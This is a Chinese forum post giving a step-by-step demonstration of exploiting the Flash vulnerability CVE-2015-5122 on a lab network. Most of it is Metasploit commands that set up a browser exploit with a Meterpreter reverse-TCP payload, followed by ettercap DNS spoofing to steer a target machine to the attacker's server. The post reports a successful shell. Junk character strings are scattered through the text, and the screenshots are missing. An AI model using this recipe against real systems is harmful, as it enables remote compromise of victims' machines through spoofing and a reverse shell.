cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

9 L, e8 A8 i3 h! _7 N 二、cve2015-5122漏洞实例演示虚拟机 . A' W, [$ t( t- S0 S

. C) P" l2 G. _ 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 0 V) R5 n- b! y. o

9 Q2 k @6 b( p, Z search cve-2015-5122如图： 6 a1 q. v% U. P2 e# }

D: ?6 y/ p4 z4 K - E- D& w4 B6 {8 q5 B9 A! t

6 v( _3 R. N9 ~ f 下面我们敲如下命令： ' D+ M8 a' N: B9 R) K* I

6 D% C" L4 r! n9 C ~, l( y$ }. C3 f use exploit/multi/browser/adobe_flash_opaque_background_uaf . _% S) V* W" z0 Z

" m8 k5 m) ~4 k- | set PAYLOAD windows/meterpreter/reverse_tcp * l# B* Q; O: D

$ p. R$ D- q- ^ set LHOST 192.168.0.109 2 x5 W" U7 @! x* N- G& Q. M

# e$ d* d+ u6 k( a# s/ r set URIPATH / /*根目录*/ 8 Q% G6 g3 L' N3 n0 T

) e1 s+ b/ [, C9 c2 x: q set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 5 Y, j5 |9 n' @! N

. N4 V4 H6 x9 H! B. e+ m9 \+ a set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 - `3 K0 R- [5 o2 V$ x" p

2 r8 k& d4 H7 {' Y3 Z 然后show options如图： ) U8 {- j5 h$ Y n

; T5 D/ o$ a4 e% i: N" ^/ S) U % n4 X( ^) x8 s' ?) @

8 d5 q" V" L: }" j' _ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
# \; E, P+ l' g! m( A + w. z c9 z+ D0 Y- w' O5 E

! O8 A& s& i- ` 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 7 N7 T$ l- }6 H

# @. D/ D$ k$ ~0 G/ k Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf & c c' M8 Y. k* W) m

; {, @- [4 @+ l$ ` g ) H% t ^3 K! r0 ?5 `2 s* a/ H

+ h2 Z N, p# c+ Q 成功了，这时候我们断开ettercap，如图： 4 N; u) Z5 M2 Q9 `

c! V: O& n" l ! R1 D8 b9 _% q5 V5 L8 |7 R

0 A% _. _! |2 F; c Screenshot如图： - t* w) Y4 k" Y' M8 l& I6 \0 v8 T% i

/ r; v/ W5 O: z* }! G * q- Q; U# {- K% h' W( H

$ ?3 Z9 a' V2 Y3 T# B . O8 Q1 S* s; w: S* D: j

		自动登录	找回密码
密码			立即注册